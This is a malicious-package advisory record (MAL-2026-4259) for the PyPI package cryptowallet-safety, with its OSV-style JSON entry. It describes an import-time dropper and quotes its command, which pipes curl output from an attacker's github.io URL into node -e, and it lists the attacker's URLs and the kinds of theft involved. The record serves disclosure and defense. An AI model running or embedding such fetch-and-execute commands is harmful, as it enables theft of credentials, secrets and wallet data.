mal-2026-4259
Vulnerability from ossf_malicious_packages
Published
2026-05-22 20:30
Modified
2026-05-26 05:55
Summary
Malicious code in cryptowallet-safety (PyPI)
Details
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d)
On import cryptowallet_safety, the top-level __init__.py (lines 13-21) shells out to curl -sL https://ddjidd564.github.io/defi-security-best-practices/payloads/wallet-safety-check.js and pipes the response body directly into node -e for execution. The fetch is unpinned (mutable URL on a personal github.io site, not the package publisher's domain), unverified (no hash or signature check), executed in an alternate runtime (Node) bypassing Python install-phase sandboxes such as pip download / pip wheel / build isolation, and errors are swallowed silently. Any developer or CI system that imports this package executes whatever JavaScript the github.io account currently serves — content the attacker can change at any time. The package self-describes as a crypto-wallet safety helper, which makes the import-time dropper especially likely to land in environments handling wallet keys.
Source: kam193 (cd2f5a911cabd7312224175b40dfeaefc3ae0b83c21747f688e608cb1afd062f)
During import, the package downloads a remote JS script that then exfiltrates environmental variables, dotenv files, cryptowallets data and other sensitive informations. It's part of a broader campaign across PyPI, NPM and Github.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-05-eth-security-auditor
Reasons (based on the campaign):
-
files-exfiltration
-
exfiltration-env-variables
-
crypto-related
-
Downloads and executes a remote malicious script.
-
exfiltration-crypto
-
exfiltration-credentials
CWE
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "cryptowallet_safety/__init__.py",
"sha256": "2a49c49da89e10b0bc4391600857911c617f471908a8a6e0bc89b0ddd7a29bbc",
"tlsh": "08711035583a2969f342c07e08297249625c31c37d8d3c30ba9cf15a9fec079ecb66b8"
}
],
"package_integrity": [
{
"filename": "cryptowallet_safety-0.1.0-py3-none-any.whl",
"hashes": {
"blake2b_256": "e7996a5e56bb97cd47c5662c649045c1c72e6e0da11de4335ce42974dbf408cf",
"md5": "c8aca73bf3eb27e25dfb67fad2a050dd",
"sha256": "ebad1e3186132b2892da38a92fb38e0e6e697e53e080adb8d2fbb899b93dc8ec"
}
}
]
}
},
"package": {
"ecosystem": "PyPI",
"name": "cryptowallet-safety"
},
"versions": [
"0.1.0"
]
}
],
"credits": [
{
"contact": [
"actran@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
},
{
"contact": [
"https://github.com/kam193",
"https://bad-packages.kam193.eu/"
],
"name": "Kamil Ma\u0144kowski (kam193)",
"type": "REPORTER"
}
],
"database_specific": {
"iocs": {
"domains": [
"ddjidd564.github.io"
],
"urls": [
"https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js",
"https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js"
]
},
"malicious-packages-origins": [
{
"id": "pypi/2026-05-eth-security-auditor/cryptowallet-safety",
"import_time": "2026-05-22T21:55:13.06737119Z",
"modified_time": "2026-05-22T21:31:52.286005Z",
"sha256": "cd2f5a911cabd7312224175b40dfeaefc3ae0b83c21747f688e608cb1afd062f",
"source": "kam193",
"versions": [
"0.1.0"
]
},
{
"id": "pypi/2026-05-eth-security-auditor/cryptowallet-safety",
"import_time": "2026-05-24T06:19:57.536326492Z",
"modified_time": "2026-05-22T21:31:52.286005Z",
"sha256": "3a4d7d7edd75dd9ba680a5a745dd9cfb9a6807ba1402568cbfee14ac2a2b6f1c",
"source": "kam193",
"versions": [
"0.1.0"
]
},
{
"id": "IN-MAL-2026-004255",
"import_time": "2026-05-26T05:52:14.775214994Z",
"modified_time": "2026-05-22T20:30:44Z",
"sha256": "276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d",
"source": "amazon-inspector",
"versions": [
"0.1.0"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d)\nOn `import cryptowallet_safety`, the top-level `__init__.py` (lines 13-21) shells out to `curl -sL https://ddjidd564.github.io/defi-security-best-practices/payloads/wallet-safety-check.js` and pipes the response body directly into `node -e` for execution. The fetch is unpinned (mutable URL on a personal github.io site, not the package publisher\u0027s domain), unverified (no hash or signature check), executed in an alternate runtime (Node) bypassing Python install-phase sandboxes such as `pip download` / `pip wheel` / build isolation, and errors are swallowed silently. Any developer or CI system that imports this package executes whatever JavaScript the github.io account currently serves \u2014 content the attacker can change at any time. The package self-describes as a crypto-wallet safety helper, which makes the import-time dropper especially likely to land in environments handling wallet keys.\n\n## Source: kam193 (cd2f5a911cabd7312224175b40dfeaefc3ae0b83c21747f688e608cb1afd062f)\nDuring import, the package downloads a remote JS script that then exfiltrates environmental variables, dotenv files, cryptowallets data and other sensitive informations. It\u0027s part of a broader campaign across PyPI, NPM and Github.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-05-eth-security-auditor\n\n\nReasons (based on the campaign):\n\n\n - files-exfiltration\n\n\n - exfiltration-env-variables\n\n\n - crypto-related\n\n\n - Downloads and executes a remote malicious script.\n\n\n - exfiltration-crypto\n\n\n - exfiltration-credentials\n",
"id": "MAL-2026-4259",
"modified": "2026-05-26T05:55:05Z",
"published": "2026-05-22T20:30:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ddjidd564"
},
{
"type": "WEB",
"url": "https://github.com/ddjidd564/defi-security-best-practices/tree/gh-pages"
},
{
"type": "WEB",
"url": "https://ddjidd564.github.io/defi-security-best-practices/wallet-verify.py"
},
{
"type": "WEB",
"url": "https://github.com/orgs/modelcontextprotocol/discussions/761"
},
{
"type": "WEB",
"url": "https://bad-packages.kam193.eu/pypi/package/cryptowallet-safety"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/cryptowallet-safety/0.1.0/"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in cryptowallet-safety (PyPI)"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…